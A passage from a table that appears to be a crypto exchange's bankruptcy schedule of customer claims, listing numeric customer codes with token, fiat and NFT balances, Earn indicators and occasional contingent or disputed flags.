| 07326403 | | ETH[.0633312], ETHW[.0633312], USD[0.00] | | |
| 07326404 | | CUSDT[1], DOGE[1.0000769], USD[0.00] | | |
| 07326406 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326407 | | USD[10.00] | | |
| 07326408 | | USD[10.00] | | |
| 07326411 | | USD[10.00] | | |
| 07326412 | | DOGE[147.375855], USD[0.00] | | |
| 07326413 | | DOGE[0], SUSHI[1.02456653], USD[0.00] | Yes | |
| 07326414 | | USD[0.00] | Yes | |
| 07326415 | | DOGE[0], USD[0.01] | | |
| 07326416 | | USD[10.00] | | |
| 07326417 | | USD[10.00] | | |
| 07326418 | | USD[10.00] | | |
| 07326419 | | CUSDT[1], USD[0.00] | | |
| 07326420 | | BTC[.00000093], USD[0.01] | Yes | |
| 07326421 | | BRZ[1], CUSDT[1], DOGE[.10297351], USD[0.01] | | |
| 07326422 | | BTC[.00244389], USD[7.93], USDT[0] | Yes | |
| 07326423 | | USD[10.00] | | |
| 07326424 | | USD[10.00] | | |
| 07326425 | | CUSDT[3], DOGE[.0000044], USD[0.01] | | |
| 07326426 | | USD[10.00] | | |
| 07326427 | | DOGE[.00000001], USD[0.00] | | |
| 07326428 | | USD[10.00] | | |
| 07326429 | | USD[10.00] | | |
| 07326430 | | USD[10.00] | | |
| 07326431 | | USD[10.00] | | |
| 07326432 | | CUSDT[1], DOGE[39.22469564], USD[0.00] | | |
| 07326433 | | CHF[0.00], DOGE[16.71763527], ETH[.00036681], ETHW[.00036681], USD[5.55], USDT[0] | Yes | |
| 07326434 | | DOGE[1], ETH[0], USD[0.00], USDT[1] | | |
| 07326436 | | CUSDT[1], DOGE[1], MATIC[109.8902403], TRX[1], USD[15.53] | | |
| 07326437 | | USD[10.00] | | |
| 07326438 | | BAT[1], BRZ[3], CUSDT[1], DOGE[4006.09388558], ETH[4.0543607], ETHW[4.0543607], GRT[2], LINK[144.81488437], SHIB[14496149.98326079], SOL[.00001405], TRX[4], USD[0.06], USDT[1] | | |
| 07326439 | | USD[10.00] | | |
| 07326440 | | DOGE[139.16052249], USD[0.00] | | |
| 07326442 | | BTC[.00025825], CUSDT[1], DOGE[85.80777154], TRX[1], USD[0.00] | | |
| 07326443 | | USD[10.00] | | |
| 07326444 | | BRZ[1], BTC[.00315467], CUSDT[2], DOGE[.00005836], ETH[.0116445], ETHW[.0116445], SHIB[2], TRX[1], USD[0.00] | | |
| 07326445 | | DOGE[2.00039464], USD[0.00] | | |
| 07326446 | | USD[10.00] | | |
| 07326447 | | USD[4.28] | | |
| 07326449 | | USD[10.00] | | |
| 07326450 | | USD[20.00] | | |
| 07326451 | | DOGE[.00001561], USD[0.05] | | |
| 07326452 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07326453 | | DOGE[.78], USD[145.16] | | |
| 07326454 | | BCH[0.00003043], BRZ[1], CUSDT[4], DOGE[1], GBP[0.00], MATIC[.00391845], SHIB[6], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07326455 | | CUSDT[1], USD[20.31] | | |
| 07326457 | | BAT[1.0165555], BCH[.00033751], BRZ[5.07952967], BTC[.00000127], CUSDT[2082.18556312], DOGE[.03002007], ETH[.00048355], ETHW[.00048355], GRT[13.29832468], LTC[.00093228], SUSHI[1.09277202], TRX[799.61525877], USD[30.09] | Yes | |
| 07326459 | | USD[10.00] | | |
| 07326460 | | BTC[0], CUSDT[1], DOGE[1], SOL[0.43919556], USD[0.00] | Yes | |
| 07326461 | | USD[10.00] | | |
| 07326462 | | BRZ[2], BTC[.00018255], CUSDT[3], DOGE[8961.49513946], SUSHI[11.06527655], TRX[1], USD[0.00] | Yes | |
| 07326463 | | BRZ[0], BTC[0], DOGE[0], ETH[0], USD[0.01], USDT[0] | Yes | |
| 07326464 | | USD[10.00] | | |
| 07326466 | | USD[10.00] | | |
| 07326467 | | USD[10.00] | | |
| 07326468 | | DOGE[21317.55792035], USD[0.00] | | |
| 07326469 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07326470 | | BRZ[2], CUSDT[16], DOGE[421.0631096], TRX[6], USD[0.00] | | |
| 07326471 | | USD[10.00] | | |
| 07326473 | | BTC[.0058032], DOGE[1], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326474 | | USD[10.00] | | |
| 07326475 | | DOGE[1.00003674], USD[0.01] | | |
| 07326476 | | BAT[1.0165555], BRZ[1], BTC[.00085697], DOGE[1], ETH[.00000188], ETHW[.00000188], NFT (3150818957508950)/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #72)[1], NFT (442444119271769520/Gentleman Monkey #8)[1], NFT (47211009353127083/Skull Love #5)[1], NFT (515324461343293181/Down town Fremont )[1], NFT (56428354952317301/0Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #51)[1], TRX[2], USD[0.93], USDT[1.08692342] | Yes | |
| 07326477 | | NFT (322930089150171882/Entrance Voucher #4203)[1], TRX[61.85071325], USD[0.91], USDT[0] | | |
| 07326478 | | DOGE[1571.22362238], USD[0.00] | | |
| 07326479 | | BTC[0], DOGE[5.14643891], USD[0.00] | | |
| 07326480 | | USD[10.00] | | |
| 07326481 | | USD[0.01] | | |
| 07326482 | | USD[10.00] | | |
| 07326483 | | USD[10.00] | | |
| 07326484 | | BF_POINT[300], CUSDT[4], USD[0.00] | Yes | |
| 07326485 | | USD[10.00] | | |
| 07326486 | | USD[10.00] | | |
| 07326489 | | USD[10.00] | | |
| 07326490 | | CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07326491 | | USD[10.00] | | |
| 07326492 | | DOGE[0], ETH[0], SHIB[0], SOL[0], USD[0.26] | Yes | |
| 07326493 | | USD[10.00] | | |
| 07326494 | | DOGE[.0765], USD[0.00] | | |
| 07326495 | | USD[10.00] | | |
| 07326496 | Contingent, Unliquidated | BAT[2], BRZ[7.18763647], DOGE[14.05978954], ETH[0], ETHW[0.01571831], SHIB[65], TRX[12], UNI[.00000001], USD[214.87], USDT[0] | Yes | |
| 07326497 | | USD[10.00] | | |
| 07326498 | | USD[11.11] | Yes | |
| 07326499 | | DOGE[.00056061], USD[0.01] | | |
| 07326500 | | USD[10.00] | | |
| 07326501 | | USD[10.00] | | |
| 07326502 | | DOGE[1695.55485163], USD[0.00] | | |
| 07326503 | | BRZ[0], USD[0.00] | Yes | |
| 07326504 | | USD[10.00] | | |
| 07326505 | | DOGE[1], ETH[.00000006], ETHW[.00000006], USD[0.00] | Yes | |
| 07326506 | | USD[10.00] | | |
| 07326507 | | BAT[12.987], DOGE[7347.51740353], SHIB[4500000], SUSHI[3.4965], TRX[999], USD[252.00], USDT[.029541] | | |
| 07326508 | | BTC[0], CUSDT[4], DOGE[2], LINK[0], TRX[2], USD[0.15], YFI[0] | Yes | |
| 07326509 | | USD[10.00] | | |
| 07326510 | | CUSDT[11], USD[114.20], USDT[0] | | |
| 07326511 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07326512 | | DOGE[167.92910167], USD[10.00] | | |
| 07326513 | | USD[10.00] | | |
| 07326514 | | CUSDT[1], ETH[0], SOL[.01866108], USD[0.01] | Yes | |
| 07326515 | | BAT[2.12320705], BRZ[1], BTC[0], CUSDT[3], DOGE[1], GRT[2.07643781], SOL[.01190832], USD[0.00], USDT[0.00000081] | Yes | |
| 07326516 | | BTC[0], DOGE[.02936705], USD[1.59], USDT[0] | | |
| 07326517 | | BRZ[2], CUSDT[11], DOGE[.71554022], ETH[.11616719], ETHW[.11616719], SHIB[1], TRX[4], USD[0.00] | | |
| 07326518 | | GRT[6.41048611], USD[0.00] | | |
| 07326519 | | USD[10.00] | | |
| 07326520 | | USD[10.00] | | |
| 07326521 | | USD[10.00] | | |
| 07326522 | | USD[10.00] | | |
| 07326523 | | BAT[5.45424991], BRZ[16.3615671], CUSDT[64.3457635], DOGE[48208.77060844], GRT[5.24030949], SHIB[78391853.65362236], SOL[77.63709128], TRX[.35520052], USD[1.57], USDT[4.36339954] | Yes | |
| 07326524 | | USD[10.00] | | |
| 07326525 | | BTC[0.00031741], CUSDT[1], USD[0.00] | | |
| 07326526 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07326527 | | USD[10.00] | | |
| 07326529 | | USD[10.00] | | |
| 07326530 | | USD[0.00] | | |
| 07326531 | | USD[10.00] | | |
| 07326532 | | BTC[3.97586453], DAI[1.44952938], ETH[215.0992555], ETHW[46.6322555], USD[12955.32] | | |
| 07326533 | | CUSDT[2], TRX[2], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326534 | | BRZ[1], DOGE[975.09031715], USD[0.00] | | |
| 07326535 | | CUSDT[4], DOGE[2], ETH[0.00036868], ETHW[0.00036868], GRT[.85366766], NFT (4773713087855662746/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #4)[1], TRX[5], USD[0.00] | Yes | |
| 07326537 | | ETH[0], ETHW[0], USD[12.56] | | |
| 07326538 | | USD[10.00] | | |
| 07326540 | | USD[10.00] | | |
| 07326541 | | BTC[.00021463], DOGE[1], USD[14.13] | | |
| 07326542 | | USD[10.00] | | |
| 07326543 | | USD[10.00] | | |
| 07326544 | | BAT[1], BRZ[3], CUSDT[4], DOGE[0], TRX[1], USD[0.00] | | |
| 07326545 | | USD[10.00] | | |
| 07326547 | | USD[10.00] | | |
| 07326548 | | DOGE[0], ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07326549 | | USD[10.00] | | |
| 07326550 | | USD[10.00] | | |
| 07326552 | | CUSDT[1], DOGE[1101.40424913], USD[0.00] | Yes | |
| 07326553 | | USD[10.00] | | |
| 07326554 | | ETH[.00036511], ETHW[60.49235331], TRX[1], USD[0.00] | Yes | |
| 07326555 | | BTC[0], DOGE[0] | | |
| 07326556 | | USD[10.00] | | |
| 07326557 | | USD[0.00] | | |
| 07326558 | | BCH[.36618119], BRZ[1], CUSDT[3], DOGE[31167.52449896], ETH[.23114095], ETHW[.23114095], LINK[4.54117602], SOL[3.539447], TRX[1351.81440352], USD[100.09], USDT[149.23567456] | | |
| 07326559 | | USD[10.00] | | |
| 07326560 | | BRZ[3], BTC[.00000889], CUSDT[3], DOGE[4.000548], GRT[3.05617046], TRX[1], USD[0.00] | Yes | |
| 07326561 | | DOGE[1], USD[15.89] | | |
| 07326562 | | USD[0.00], USDT[0] | | |
| 07326563 | | BTC[0], USD[0.61] | Yes | |
| 07326564 | | USD[10.00] | | |
| 07326565 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07326567 | | USD[10.00] | | |
| 07326568 | | DOGE[10124.93943882], USD[0.00] | | |
| 07326569 | | CUSDT[1], USD[0.01] | | |
| 07326570 | | DOGE[0], ETH[0], LTC[0], NFT (328057069335266825/Boneworld #8289)[1], NFT (434329223491449517/Boneworld #7575)[1], NFT (436746085610166196/Boneworld #911)[1], NFT (496513090392868238/Roamer #704)[1], NFT (498748028976394942/Ravager #1893)[1], NFT (525210902110046515/Ravager #1409)[1], NFT (526996150494035697/Ravager #1477)[1], SOL[0.02633820], USD[0.00] | | |
| 07326571 | | CUSDT[1], USD[0.00] | Yes | |
| 07326573 | | BRZ[7], BTC[0], CUSDT[5], DOGE[0], SOL[3.06527164], TRX[5], USD[0.00], USDT[0] | | |
| 07326574 | | BRZ[1], DOGE[97.07134031], TRX[4], USD[0.00] | | |
| 07326575 | | BRZ[1], CUSDT[2], DOGE[186.16208713], USD[0.00] | | |
| 07326577 | | USD[10.00] | | |
| 07326578 | | DOGE[597.072], USD[0.45] | | |
| 07326579 | | USD[10.00] | | |
| 07326580 | | BRZ[1], DOGE[18051.52443225], ETH[1.05578108], ETHW[1.05578108], LTC[1.14066284], TRX[5], USD[0.00] | | |
| 07326581 | | BRZ[0.00000010], ETH[0.00021939], ETHW[0.00021939], GRT[339.02529115], USD[0.00] | Yes | |
| 07326582 | | BAT[1], BRZ[7], CUSDT[34], DOGE[7], GRT[2], TRX[21], USD[0.01] | | |
| 07326583 | | USD[10.00] | | |
| 07326586 | | BRZ[1], CUSDT[1], DOGE[0], GRT[1.00483351], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07326587 | | NFT (554617083072535735/Coachella x FTX Weekend 2 #5484)[1], USD[0.00] | | |
| 07326588 | | USD[10.00] | | |
| 07326589 | | DOGE[125.0393874], USD[0.00] | | |
| 07326590 | | DOGE[2], USD[0.00] | | |
| 07326591 | | DOGE[83.01425809], ETH[.00253277], ETHW[.00253277], USD[0.00] | | |
| 07326593 | | BRZ[1], CUSDT[3], DOGE[447.38547868], SHIB[1], USD[0.00] | | |
| 07326594 | | LTC[0], USD[0.00] | | |
| 07326595 | | USD[10.00] | | |
| 07326596 | | TRX[2], USD[0.00] | Yes | |
| 07326597 | | USD[10.00] | | |
| 07326598 | | USD[10.00] | | |
| 07326600 | | DOGE[439.60633776], USD[0.00] | | |
| 07326601 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326602 | | USD[10.00] | | |
| 07326603 | | USD[10.00] | | |
| 07326604 | | DOGE[0], ETH[0], USD[0.01], USDT[0] | | |
| 07326605 | | BRZ[1], CUSDT[2], DOGE[1.00004525], ETH[.39481759], ETHW[.39481759], GRT[1], TRX[1], USD[1154.41] | | |
| 07326606 | | USD[10.00] | | |
| 07326607 | | BRZ[4], CUSDT[29], DOGE[6.83200729], TRX[13], USD[0.00] | | |
| 07326608 | | USD[10.00] | | |
| 07326609 | | CUSDT[1], DOGE[3], LINK[.32761594], SOL[2.06312376], USD[0.00] | | |
| 07326610 | | USD[0.07] | | |
| 07326611 | | BRZ[3], CUSDT[5], GRT[2], SHIB[1], TRX[4], USD[0.00] | Yes | |
| 07326613 | | USD[10.00] | | |
| 07326614 | | USD[0.28] | Yes | |
| 07326615 | | DOGE[1], ETH[.00280628], ETHW[.00276524], TRX[1], USD[0.01] | Yes | |
| 07326616 | | USD[10.00] | | |
| 07326617 | | BTC[.00017678], USD[0.00] | | |
| 07326618 | | BRZ[1], CUSDT[2], DOGE[3636.12528397], SHIB[750530.07523678], USD[100.69] | Yes | |
| 07326619 | | USD[10.00] | | |
| 07326620 | | BAT[2], BRZ[1], CUSDT[2], DOGE[1433.24947457], GRT[1], TRX[3], USD[0.00], USDT[5] | | |
| 07326621 | | USD[0.00] | | |
| 07326622 | | TRX[1], USD[0.00] | | |
| 07326623 | | ETH[0.00042275], ETHW[.00042275], USD[0.00] | | |
| 07326624 | | BAT[1], DOGE[0], TRX[4], USD[0.01], USDT[1] | | |
| 07326625 | | USD[10.00] | | |
| 07326627 | | DOGE[100.84728449], USD[2.82] | | |
| 07326628 | | BAT[1.01655549], BRZ[1], CUSDT[622.16646582], DOGE[2731.00598614], TRX[314.96158825], USD[0.00] | Yes | |
| 07326629 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07326630 | | USD[10.00] | | |
| 07326631 | | SOL[0], TRX[0], USD[0.01] | Yes | |
| 07326632 | | USD[10.00] | | |
| 07326633 | | USD[10.00] | | |
| 07326634 | | BRZ[0], DOGE[0], SOL[0], SUSHI[0], TRX[5258.09152441], USD[0.02] | Yes | |
| 07326635 | | CUSDT[1], DOGE[102.36106347], USD[0.00] | | |
| 07326636 | | TRX[61.09431153], USD[0.00] | | |
| 07326637 | | DOGE[1.00004941], USD[0.00] | | |
| 07326638 | | USD[10.00] | | |
| 07326639 | | BRZ[1], DOGE[1054.97088838], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07326641 | | USD[10.00] | | |
| 07326642 | | DOGE[26.15584373], USD[0.00] | | |
| 07326643 | | USD[10.00] | | |
| 07326644 | | BTC[0.00012594], CUSDT[1], USD[0.00] | Yes | |
| 07326646 | | CUSDT[2], DOGE[42.1168954], USD[0.00] | | |
| 07326647 | | USD[10.00] | | |
| 07326648 | | USD[0.00], USDT[0] | | |
| 07326649 | | USD[10.00] | | |
| 07326651 | | USD[10.00] | | |
| 07326652 | | DOGE[547.68304105], USD[0.00] | | |
| 07326653 | | USD[10.00] | | |
| 07326654 | | SOL[.88760141], USD[0.00] | | |
| 07326655 | | BTC[0.00000137], DOGE[2], SOL[0.00000091], USD[0.01], USDT[0.00000020] | Yes | |
| 07326656 | | BRZ[4], CUSDT[6], GRT[1], TRX[6], USD[0.01] | | |
| 07326657 | | USD[10.00] | | |
| 07326658 | | DOGE[1.30639861], USD[10.15] | | |
| 07326659 | | USD[10.00] | | |
| 07326660 | | BRZ[1], CUSDT[1], DOGE[2098.31820573], ETH[.10487335], ETHW[.10487335], USD[0.01] | | |
| 07326661 | | USD[10.00] | | |
| 07326662 | | BRZ[1], CUSDT[1], DOGE[1.97738521], TRX[.42548232], USD[0.12] | | |
| 07326663 | | USD[10.00] | | |
| 07326664 | | DOGE[.00004361], USD[0.07] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326665 | | BRZ[1], DOGE[1000.34131645], USD[10.00] | | |
| 07326666 | | USD[0.00] | | |
| 07326668 | | CUSDT[1], DOGE[139.08766834], USD[0.00] | | |
| 07326669 | | USD[10.00] | | |
| 07326670 | | USD[10.00] | | |
| 07326671 | | USD[10.00] | | |
| 07326673 | | DOGE[14.94011144], USD[0.00] | | |
| 07326674 | | KSHIB[0], SHIB[0], USD[0.00] | Yes | |
| 07326675 | | USD[10.00] | | |
| 07326676 | | USD[0.00] | | |
| 07326677 | | USD[10.00] | | |
| 07326678 | | USD[10.00] | | |
| 07326679 | | USD[10.00] | | |
| 07326680 | | USD[10.00] | | |
| 07326683 | | USD[10.00] | | |
| 07326685 | | CUSDT[4], DOGE[3], GRT[.00004405], USD[0.50], USDT[1.08831405] | Yes | |
| 07326686 | | SOL[.91680165], TRX[1], USD[0.87] | | |
| 07326687 | | USD[0.00] | | |
| 07326688 | | BRZ[1], CUSDT[1], SHIB[2], SOL[7.62695519], TRX[3], USD[0.00] | Yes | |
| 07326689 | | CUSDT[1], SUSHI[.59519036], USD[0.00] | | |
| 07326690 | | CUSDT[6], DOGE[141.95093293], USD[0.00] | | |
| 07326691 | | USD[0.00] | Yes | |
| 07326692 | | BTC[.00296858], CUSDT[1], DOGE[2], USD[0.00] | | |
| 07326693 | | USD[11.03] | Yes | |
| 07326694 | | USD[10.00] | | |
| 07326695 | | DOGE[0.46985026], ETHW[5.03307640], LTC[.00052233], TRX[0], USD[0.00] | | |
| 07326697 | | CUSDT[2], USD[87.27] | | |
| 07326698 | | USD[10.00] | | |
| 07326701 | | USD[0.00] | | |
| 07326702 | | SUSHI[.69735242], USD[0.00] | | |
| 07326704 | | BTC[.00003525], DOGE[0], SOL[2.51693725], USD[0.79] | | |
| 07326705 | | BRZ[2], CUSDT[4], DOGE[226.09385067], TRX[2], USD[0.00], USDT[1] | | |
| 07326706 | | USD[10.00] | | |
| 07326707 | | USD[10.00] | | |
| 07326709 | | DOGE[1423.32943425], USD[0.00] | | |
| 07326710 | | BAT[1], BCH[0], BRZ[4], BTC[0], CUSDT[12], DOGE[1], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], YFI[0] | | |
| 07326711 | | USD[0.01] | | |
| 07326712 | | USD[10.00] | | |
| 07326713 | | CUSDT[1], USD[0.01] | | |
| 07326715 | | CUSDT[4.00951655], DOGE[2], MATIC[11.38117089], USD[0.01] | Yes | |
| 07326717 | | BTC[.00019844], USD[0.00] | Yes | |
| 07326718 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07326719 | | BTC[0], DOGE[0], ETH[0] | | |
| 07326720 | | BTC[0.00008877], DOGE[0], USD[10.00] | | |
| 07326721 | | USD[10.00] | | |
| 07326723 | | USD[0.00], USDT[0] | | |
| 07326725 | | USD[10.00] | | |
| 07326726 | | USD[10.00] | | |
| 07326727 | | CUSDT[5], TRX[1], USD[0.00] | | |
| 07326728 | | USD[10.00] | | |
| 07326729 | | USD[0.00] | Yes | |
| 07326730 | | USD[10.00] | | |
| 07326731 | | BTC[.00020627], USD[10.00] | | |
| 07326733 | | USD[10.00] | | |
| 07326734 | | USD[10.00] | | |
| 07326735 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07326736 | | USD[50.00] | | |
| 07326737 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326738 | | USD[10.00] | | |
| 07326739 | | DOGE[3099.80807116], GRT[1], USD[0.00] | | |
| 07326741 | | USD[10.00] | | |
| 07326742 | | USD[10.00] | | |
| 07326744 | | USD[10.00] | | |
| 07326745 | | USD[10.00] | | |
| 07326746 | | DOGE[6111.72861684], TRX[2], USD[545.78] | | |
| 07326747 | | DOGE[1.0098152], USD[0.00] | | |
| 07326748 | | BRZ[1], CUSDT[16], DOGE[900.92458749], TRX[26.62880839], USD[0.00] | | |
| 07326749 | | USD[10.00] | | |
| 07326750 | | USD[20.00] | | |
| 07326751 | | SOL[0.35387477], USD[0.00] | Yes | |
| 07326752 | | CUSDT[3], USD[7.25] | | |
| 07326753 | | USD[10.00] | | |
| 07326755 | | USD[10.00] | | |
| 07326756 | | USD[10.00] | | |
| 07326757 | Contingent, Disputed | USD[10.00] | | |
| 07326759 | | USD[10.00] | | |
| 07326760 | | CUSDT[1], ETH[.00696448], ETHW[.0068824], USD[0.00] | Yes | |
| 07326761 | | DOGE[0], ETH[0], GRT[0], MATIC[0], MKR[0], NFT (55696013070368571/Entrance Voucher #3042)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07326762 | | USD[10.96] | Yes | |
| 07326764 | | CUSDT[1], DOGE[834.71639661], USD[0.00] | | |
| 07326765 | | BTC[0], MATIC[0], USD[0.00], USDT[0.00000001] | | |
| 07326766 | | USD[10.00] | | |
| 07326767 | | USD[0.00] | | |
| 07326768 | | USD[10.00] | | |
| 07326769 | | USD[10.00] | | |
| 07326770 | | BAT[.00000001], BF_POINT[300], LTC[0], SOL[0], USD[22.47], USDT[0] | Yes | |
| 07326771 | | USD[10.00] | | |
| 07326772 | | USD[10.00] | | |
| 07326773 | | USD[10.00] | | |
| 07326774 | | DOGE[.7986], USD[0.30] | | |
| 07326775 | | USD[0.00] | | |
| 07326776 | | BRZ[1], CUSDT[1], DOGE[44.33789527], ETH[.00696833], ETHW[.00696833], TRX[1], USD[0.00] | | |
| 07326777 | | USD[10.00] | | |
| 07326778 | | USD[10.91] | Yes | |
| 07326779 | | USD[10.00] | | |
| 07326780 | | BRZ[1], CUSDT[1], TRX[2], USD[0.19] | | |
| 07326781 | | BTC[.00029697], CUSDT[8], DOGE[.00000609], USD[0.35] | Yes | |
| 07326782 | | USD[20.00] | | |
| 07326784 | | USD[10.00] | | |
| 07326785 | | DOGE[1], USD[0.01] | | |
| 07326787 | | USD[10.00] | | |
| 07326788 | | USD[10.00] | | |
| 07326790 | | USD[10.00] | | |
| 07326792 | | BCH[0], BRZ[1], BTC[0.00237400], CUSDT[20], DOGE[120.35087282], ETH[0.02294182], ETHW[0.02294182], GRT[0], MATIC[2.39198041], SHIB[321236.37162367], SOL[4.69213935], SUSHI[0], TRX[0], USD[0.00] | | |
| 07326793 | | ETH[.00904182], ETHW[.00904182], USD[0.00] | | |
| 07326794 | | BTC[.03340559], DOGE[41676.72665052], USD[0.00] | | |
| 07326795 | | USD[10.00] | | |
| 07326796 | | USD[10.00] | | |
| 07326797 | | DOGE[418.49899081], TRX[1], USD[0.00] | | |
| 07326799 | | USD[10.00] | | |
| 07326800 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07326801 | | USD[10.00] | | |
| 07326802 | | CUSDT[1], DOGE[276.27669781], TRX[2], USD[0.00] | | |
| 07326803 | | USD[0.00] | | |
| 07326804 | | USD[10.96] | Yes | |
| 07326805 | | DOGE[50.89319148], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326806 | | BAT[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07326807 | | USD[10.00] | | |
| 07326808 | | BTC[.00668994], CUSDT[3], DOGE[4438.01836028], ETH[.16788374], ETHW[.16754867], TRX[1], USD[0.00] | Yes | |
| 07326809 | | USD[10.00] | | |
| 07326810 | | BRZ[2], CUSDT[5], TRX[2], USD[0.00] | Yes | |
| 07326811 | | DOGE[.65399577], USD[10.69] | | |
| 07326812 | | ETH[0], USD[0.00] | | |
| 07326813 | | USD[0.01] | | |
| 07326814 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1253.21732409], USD[0.59] | | |
| 07326816 | | USD[0.00] | | |
| 07326817 | | USD[10.00] | | |
| 07326818 | | CUSDT[1], USD[0.00] | | |
| 07326819 | | USD[10.00] | | |
| 07326821 | | USD[10.00] | | |
| 07326822 | | USD[10.00] | | |
| 07326823 | | USD[10.00] | | |
| 07326825 | | CUSDT[12], USD[0.01], USDT[0] | | |
| 07326827 | | BTC[0], DOGE[0], ETH[0], TRX[7.53133024], USD[0.00] | Yes | |
| 07326829 | | CUSDT[9], SUSHI[3.70409346], USD[0.00] | Yes | |
| 07326830 | | USD[10.00] | | |
| 07326831 | | USD[10.00] | | |
| 07326832 | | DOGE[486.66512016], TRX[1], USD[0.00] | | |
| 07326834 | | USD[10.00] | | |
| 07326835 | | CUSDT[1], DOGE[2], TRX[77.51641176], USD[0.01] | Yes | |
| 07326836 | | USD[10.00] | | |
| 07326837 | | USD[10.00] | | |
| 07326838 | | USD[10.00] | | |
| 07326839 | | USD[10.00] | | |
| 07326840 | | USD[10.00] | | |
| 07326841 | | CUSDT[5], DOGE[1200.09584119], USD[130.17] | | |
| 07326843 | | DOGE[48.06769707], USD[0.00] | Yes | |
| 07326844 | | USD[10.00] | | |
| 07326845 | | USD[0.01] | | |
| 07326846 | | BRZ[1], CUSDT[1], DOGE[4], USD[0.00] | | |
| 07326847 | | USDT[0] | | |
| 07326849 | | USD[10.00] | | |
| 07326850 | | BRZ[3], CUSDT[2], DOGE[2], USD[0.00] | | |
| 07326851 | | USD[10.00] | | |
| 07326852 | | USD[10.00] | | |
| 07326853 | | ETH[.00607599], ETHW[.00607599], USD[0.00] | | |
| 07326854 | | USD[0.00] | | |
| 07326855 | | CUSDT[1], DOGE[14.68568979], USD[0.61] | | |
| 07326856 | | USD[10.00] | | |
| 07326858 | | DOGE[1], USD[0.00] | | |
| 07326859 | | DAI[4.96112881], DOGE[408.31098784], TRX[57.54239867], USD[0.00] | | |
| 07326860 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07326861 | | USD[10.00] | | |
| 07326862 | | BTC[0], ETHW[.019981], NFT (401271476844350320/Australia Ticket Stub #1630)[1], USD[0.00], USDT[28.33] | | |
| 07326864 | | CUSDT[1.90328932], DOGE[7.29951407], ETH[.00084241], ETHW[.00082891], SHIB[187512.34374704], SOL[.00308049], USD[1.49] | Yes | |
| 07326865 | Contingent, Disputed | USD[11.08] | Yes | |
| 07326866 | | USD[10.00] | | |
| 07326867 | | BTC[.0087623], CUSDT[1], USD[0.00] | | |
| 07326868 | | USD[10.00] | | |
| 07326869 | | BAT[113.94906429], DOGE[2564.69787859], GRT[5.25599064], LINK[9.63525007], SOL[20.31428439], SUSHI[10.87224064], TRX[2203.18379031], UNI[3.30361955], USD[0.00] | Yes | |
| 07326870 | | USD[10.00] | | |
| 07326871 | | USD[10.00] | | |
| 07326872 | | USD[10.00] | | |
| 07326873 | | BAT[1.0165555], BRZ[3], CUSDT[1], GRT[1.00313735], TRX[1], USD[0.00], USDT[1.08648681] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326874 | | BTC[.00010755], CUSDT[1], DOGE[1], USD[0.19] | | |
| 07326875 | | CUSDT[3], USD[0.01] | | |
| 07326878 | | USD[10.00] | | |
| 07326879 | | USD[10.00] | | |
| 07326880 | | USD[10.00] | | |
| 07326881 | | USD[0.00] | | |
| 07326882 | | USD[10.00] | | |
| 07326883 | | USD[10.00] | | |
| 07326884 | | CUSDT[1], DOGE[26.27620599], TRX[1], USD[0.00] | Yes | |
| 07326885 | | USD[10.00] | | |
| 07326886 | | USD[10.00] | | |
| 07326887 | | DOGE[43.64718138], USD[0.00] | | |
| 07326888 | | BRZ[1], CUSDT[21], DOGE[.00002853], SHIB[16.25295427], SOL[.08133301], TRX[3], USD[0.01] | Yes | |
| 07326889 | | SOL[3.316846], SUSHI[.02804156], USD[217.79] | | |
| 07326890 | | USD[10.00] | | |
